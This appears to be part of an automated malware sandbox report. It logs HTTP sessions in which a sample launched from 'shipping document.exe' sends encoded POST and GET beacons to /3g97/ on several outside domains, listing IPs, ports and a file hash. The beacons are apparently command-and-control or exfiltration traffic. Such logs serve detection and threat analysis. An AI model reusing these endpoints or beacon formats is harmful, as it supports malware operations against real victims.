31 | 192.168.2.4 | 49772 | 34.149.87.45 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:28:22.721571922 CEST | 10845 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.corvidemporium.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.corvidemporium.com
                                                                                              Referer: http://www.corvidemporium.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:28:22.926213980 CEST | 1079 | IN | HTTP/1.1 403 Forbidden
                                                                                              Content-Length: 548
                                                                                              Content-Type: text/html
                                                                                              Server: Pepyaka
                                                                                              X-Wix-Request-Id: 1713936502.82334837651244156285
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Wed, 24 Apr 2024 05:28:22 GMT
                                                                                              X-Served-By: cache-bur-kbur8200108-BUR
                                                                                              X-Cache: MISS
                                                                                              X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,T7xPrjRFKDMHVv938PYVfx9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb6JxSuEU9PIuIbre7VUIJiy
                                                                                              Via: 1.1 google
                                                                                              glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                              Connection: close
                                                                                              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.4 | 49773 | 34.149.87.45 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:28:25.424794912 CEST | 460 | OUT | GET /3g97/?12l42=xT2trqCQSb0YGfwnfC7AAWCSgoebgz86z2nMETOowAc4zyKeScBuNk+zQrcmduROogVqNtfeQZVF2OAhYZAs5wKafa9/anE/xTNtRCFpw92mm1bEow/bC00=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.corvidemporium.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:28:25.682203054 CEST | 1289 | IN | HTTP/1.1 404 Not Found
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              X-Wix-Request-Id: 1713936505.5353489358346334572
                                                                                              Age: 0
                                                                                              Server: Pepyaka
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Accept-Ranges: bytes
                                                                                              Date: Wed, 24 Apr 2024 05:28:25 GMT
                                                                                              X-Served-By: cache-bur-kbur8200142-BUR
                                                                                              X-Cache: MISS
                                                                                              Vary: Accept-Encoding
                                                                                              Server-Timing: cache;desc=miss, varnish;desc=miss_miss, dc;desc=fastly_sea1_g
                                                                                              X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,xIKq3IotbbLp4+7DTTMx8R9slopJdhD+WySraMrpIY8=,m0j2EEknGIVUW/liY8BLLqPXpcX6IEGf7sG3D7kVVb690urzQo8znCIRFiqxF/nR,2d58ifebGbosy5xc+FRalsfKRjkvyVNx6F/MgVi8KAXjsEimH09mQSUzjf+MlEbWutsYt+BqfLnLyvHX+3ZU2A==,2UNV7KOq4oGjA5+PKsX47HqjR+6CNmn/ng3r7CWVjR4=,R8nVwPJv9QJL1m78OROO+IV9oD+TXFc2vEfvXLHbcEY=,znHLAI6vxugFKypFMbJjolwf8wWTJVQybTnH7MNlwkYSO5XmrrCSQNDehIjmfew3bNsG/ydVSs9vBX3FVb1aSQ==
                                                                                              Transfer-Encoding: chunked
                                                                                              Via: 1.1 google
                                                                                              glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                                                              Connection: close
                                                                                              Data Ascii: bf1 ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <title ng-bind="'page_title' | translate"></title> <meta name="description" conten
Apr 24, 2024 07:28:25.682255030 CEST | 1289 | IN |
                                                                                              Data Ascii: t=""> <meta name="viewport" content="width=device-width"> <meta name="robots" content="noindex, nofollow"> ... --> <link type="image/png" href="//www.wix.com/favicon.ico" rel="shortcut icon"> ... --> <link href="//static.para
Apr 24, 2024 07:28:25.682342052 CEST | 1289 | IN |
                                                                                              Data Ascii: r-translate/1.1.1/angular-translate.min.js"></script><script src="//static.parastorage.com/services/wix-public/1.719.0/scripts/error-pages/locale/messages_en.js"></script> ... --><script src="//static.parastorage.com/services/wix-public
Apr 24, 2024 07:28:25.682379961 CEST | 132 | IN |
                                                                                              Data Ascii: ">update your browser.</a></span> </div> </div></div>... verification -->... end verification --></body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.4 | 49774 | 31.186.11.254 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:28:32.187218904 CEST | 737 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.levelstep.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.levelstep.online
                                                                                              Referer: http://www.levelstep.online/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=RjgYMgzSKjyIWLKwWcJvG63LX4xFrRC7R31J1jFBig40o32mDWIIpE1FSLQhnBIlqVT6KhVDem5rvXoCI0H/mpRoIVpmIRUUMDthXE+G2tntzUND+fv9Kpenzg7aqbQ6vR5Cj/cmeP1hfNCz4+bW3JMMH0jG1FDlyaMCJ+BJYax7VJEiMsynSXOpUB0GXtztbA==
Apr 24, 2024 07:28:32.545361042 CEST | 469 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:55 GMT
                                                                                              Server: Apache/2.2.15 (CentOS)
                                                                                              Content-Length: 289
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49775 | 31.186.11.254 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:28:35.078109980 CEST | 757 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.levelstep.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.levelstep.online
                                                                                              Referer: http://www.levelstep.online/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=RjgYMgzSKjyIHaawV/hvXa3KKIxFlxC/R2JJ1iRriyc0oV+mCXII8E1FKbRr6RI6qVvyKgpDeiRrvSUCIFH+n5RqA1pgFxUUMDthXEqs2t/tzl9D/+vyJpe40g7aubR9vR5wj9oMeN9hfJGz4qHVtZNHakjSllSSyPx3W9lza7sYZvV4ddTwAXqaJG9yauOkAKvvjQU5ivz6dfgTy8dKTk0=
                                                                                              Timestamp: Apr 24, 2024 07:28:35.435842991 CEST; Bytes transferred: 469; Direction: IN; Data:
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:27:58 GMT
                                                                                              Server: Apache/2.2.15 (CentOS)
                                                                                              Content-Length: 289
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>


                                                                                              Session ID: 35; Source IP: 192.168.2.4; Source Port: 49776; Destination IP: 31.186.11.254; Destination Port: 80; PID: 1620; Process: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp: Apr 24, 2024 07:28:37.980017900 CEST; Bytes transferred: 10839; Direction: OUT; Data:
                                                                                              POST /3g97/ HTTP/1.1
                                                                                              Host: www.levelstep.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.levelstep.online
                                                                                              Referer: http://www.levelstep.online/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Timestamp: Apr 24, 2024 07:28:38.336600065 CEST; Bytes transferred: 469; Direction: IN; Data:
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:28:01 GMT
                                                                                              Server: Apache/2.2.15 (CentOS)
                                                                                              Content-Length: 289
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>


                                                                                              Session ID: 36; Source IP: 192.168.2.4; Source Port: 49777; Destination IP: 31.186.11.254; Destination Port: 80; PID: 1620; Process: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp: Apr 24, 2024 07:28:40.873035908 CEST; Bytes transferred: 458; Direction: OUT; Data:
                                                                                              GET /3g97/?AlB=sdJPX&12l42=chI4PXqGf2akS9KXcN1/fIedDZpx1haPemMkxCQLjjdC+0LHJVcL8RVSGr04qmANi3qgGmUbQWZg1h9oBh32jeRnCnRBYigKMCJed0uSuMGI415b3fHmBd4= HTTP/1.1
                                                                                              Host: www.levelstep.online
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Timestamp: Apr 24, 2024 07:28:41.227427959 CEST; Bytes transferred: 469; Direction: IN; Data:
                                                                                              HTTP/1.1 404 Not Found
                                                                                              Date: Wed, 24 Apr 2024 05:28:04 GMT
                                                                                              Server: Apache/2.2.15 (CentOS)
                                                                                              Content-Length: 289
                                                                                              Connection: close
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /3g97/ was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at www.levelstep.online Port 80</address></body></html>


                                                                                              Session ID: 37; Source IP: 192.168.2.4; Source Port: 49778; Destination IP: 91.195.240.19; Destination Port: 80; PID: 1620; Process: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp: Apr 24, 2024 07:28:46.802004099 CEST; Bytes transferred: 734; Direction: OUT; Data:
                                                                                              POST /3g97/ HTTP/1.1
                                                                                              Host: www.brothedboil.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.brothedboil.com
                                                                                              Referer: http://www.brothedboil.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=fgOOYaQZh36ZnKoG3uqYJuSTTVJW9dv/+N4iYxqxbD+/5zl7wbajNVob+ZiSvgGxr/T8mMGVqeMddxyIpuSTQXyLh+vzzOK2NrsaydZ+pUl3e7iFfamRRNFPICMzrg7bZPr3Nb1nu9eTiAOMatNatkuzIhzCbjGR2LiaP8X0GQ+lKN4c9BtiNNZaHOWpdozWHA==
                                                                                              Timestamp: Apr 24, 2024 07:28:47.119467974 CEST; Bytes transferred: 701; Direction: IN; Data:
                                                                                              HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:28:46 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session ID: 38; Source IP: 192.168.2.4; Source Port: 49779; Destination IP: 91.195.240.19; Destination Port: 80; PID: 1620; Process: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp: Apr 24, 2024 07:28:49.635121107 CEST; Bytes transferred: 754; Direction: OUT; Data:
                                                                                              POST /3g97/ HTTP/1.1
                                                                                              Host: www.brothedboil.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.brothedboil.com
                                                                                              Referer: http://www.brothedboil.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=fgOOYaQZh36ZmqYG2NyYLOSSPlJWz9vF+NkiYw/ubxK/5TV7iKajOVob25iTxQGur/OJmMKVqewddwCIpfSQRHyF9+vit+K2Nrsayc9EpU93eKSFZ7mWN9FAAiMz6Q7fZPqSNao6u7STiB+MZ8NVnkuxHByBRBDUyqXIQ8SSJDrDGrpGswM1fN9paJfdQrOfcDCtll1OXVawog5KR+skThk=
                                                                                              Timestamp: Apr 24, 2024 07:28:49.940563917 CEST; Bytes transferred: 701; Direction: IN; Data:
                                                                                              HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:28:49 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session ID: 39; Source IP: 192.168.2.4; Source Port: 49780; Destination IP: 91.195.240.19; Destination Port: 80; PID: 1620; Process: C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
                                                                                              Timestamp: Apr 24, 2024 07:28:52.470910072 CEST; Bytes transferred: 10836; Direction: OUT; Data:
                                                                                              POST /3g97/ HTTP/1.1
                                                                                              Host: www.brothedboil.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.brothedboil.com
                                                                                              Referer: http://www.brothedboil.com/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:28:52.778855085 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:28:52 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49781 | 91.195.240.19 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:28:55.307064056 CEST | 457 | OUT | GET /3g97/?12l42=SimubthO8j6ps9851O6iFrPFbhU0j9rq0/tYQBfzEgGK5hVM85jEDi8N6ZmkhSeBx8n/pYDrpewbJx/zj6rVSge67MmYz8zyJ6w88vNyo3JtRae+fbqeQKU=&AlB=sdJPX HTTP/1.1
                                                                                              Host: www.brothedboil.com
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Apr 24, 2024 07:28:55.969573975 CEST | 1289 | IN | HTTP/1.1 200 OK
                                                                                              date: Wed, 24 Apr 2024 05:28:55 GMT
                                                                                              content-type: text/html; charset=UTF-8
                                                                                              transfer-encoding: chunked
                                                                                              vary: Accept-Encoding
                                                                                              x-powered-by: PHP/8.1.17
                                                                                              expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                              cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              pragma: no-cache
                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_NaZKrRTRgWemhl00YBRNWY038LOpPrfM5J/8/1fs1QO9sD+YlTbtAqcHs6JJ9uYhlOrdvlhX6s3SYSBFNmp7eg==
                                                                                              last-modified: Wed, 24 Apr 2024 05:28:55 GMT
                                                                                              x-cache-miss-from: parking-55fd589654-f8w9d
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: 2CF<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_NaZKrRTRgWemhl00YBRNWY038LOpPrfM5J/8/1fs1QO9sD+YlTbtAqcHs6JJ9uYhlOrdvlhX6s3SYSBFNmp7eg==><head><meta charset="utf-8"><title>brothedboil.com&nbsp;-&nbsp;brothedboil Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="brothedboil.com is your first and best source for all of the information youre looking for. From gen


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49782 | 91.195.240.19 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:29:18.390719891 CEST | 731 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.tondex.finance
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 202
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tondex.finance
                                                                                              Referer: http://www.tondex.finance/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=nfFWPOMF+TnsTr0ve8OabwZKYnLHTOi2H7aLlDov4MSrMXtSM4V2/uQmcbV2dvTw/k2drL+yWBri4pDmK3abEFkuDHmI4o7bTIbvqFSVBw86RH23y3fYcXBxN2E4Gak/7WeK+UBLcLaGos8yqr+xZPv1uIMoRrp23qycdwRILqr2zRqWb8HbBMSLwoT7jex2uw==
Apr 24, 2024 07:29:18.696398020 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:29:18 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49783 | 91.195.240.19 | 80 | 1620 | C:\Program Files (x86)\fCHtILpYpFbWFzXFGNwToQmYRczXdrUMSrMjxIdUESsXVazGuJRZrDpkvESvVQMyw\oWRaEnEJAq.exe
Timestamp | Bytes transferred | Direction | Data
Apr 24, 2024 07:29:21.231363058 CEST | 751 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.tondex.finance
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 222
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tondex.finance
                                                                                              Referer: http://www.tondex.finance/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Data Ascii: 12l42=nfFWPOMF+TnscqEvNbSaTwZNGXLHauiyH7GLlBE/4f2rJDpSN692v+QmT7VzDfT3/kqjrJ6yWF7i4snmLHmYEVksaXmK1I7bTIbvqFG/B0Q6RXG3zWfbR3ByK2E4QqkF7WeS+VcWcJiGotsyr6+yTPv3hoM6S+MczoL0UzdaC+fA737MKNmMTM24tvaPudM/1ygxDj1pvhIz/FZ8tYpp+bc=
Apr 24, 2024 07:29:21.588248968 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:29:21 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                              43 | 192.168.2.4 | 49784 | 91.195.240.19 | 80
                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                              Apr 24, 2024 07:29:24.447482109 CEST | 10833 | OUT | POST /3g97/ HTTP/1.1
                                                                                              Host: www.tondex.finance
                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                              Connection: close
                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                              Content-Length: 10302
                                                                                              Cache-Control: max-age=0
                                                                                              Origin: http://www.tondex.finance
                                                                                              Referer: http://www.tondex.finance/3g97/
                                                                                              User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                              Apr 24, 2024 07:29:24.763474941 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                              date: Wed, 24 Apr 2024 05:29:24 GMT
                                                                                              content-type: text/html
                                                                                              content-length: 556
                                                                                              server: NginX
                                                                                              connection: close
                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                              Target ID:0
                                                                                              Start time:07:25:15
                                                                                              Start date:24/04/2024
                                                                                              Path:C:\Users\user\Desktop\shipping document.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\Desktop\shipping document.exe"
                                                                                              Imagebase:0xf50000
                                                                                              File size:730'112 bytes
                                                                                              MD5 hash:180165361384E56DB00389733F0C54F5
                                                                                              Has elevated privileges:true
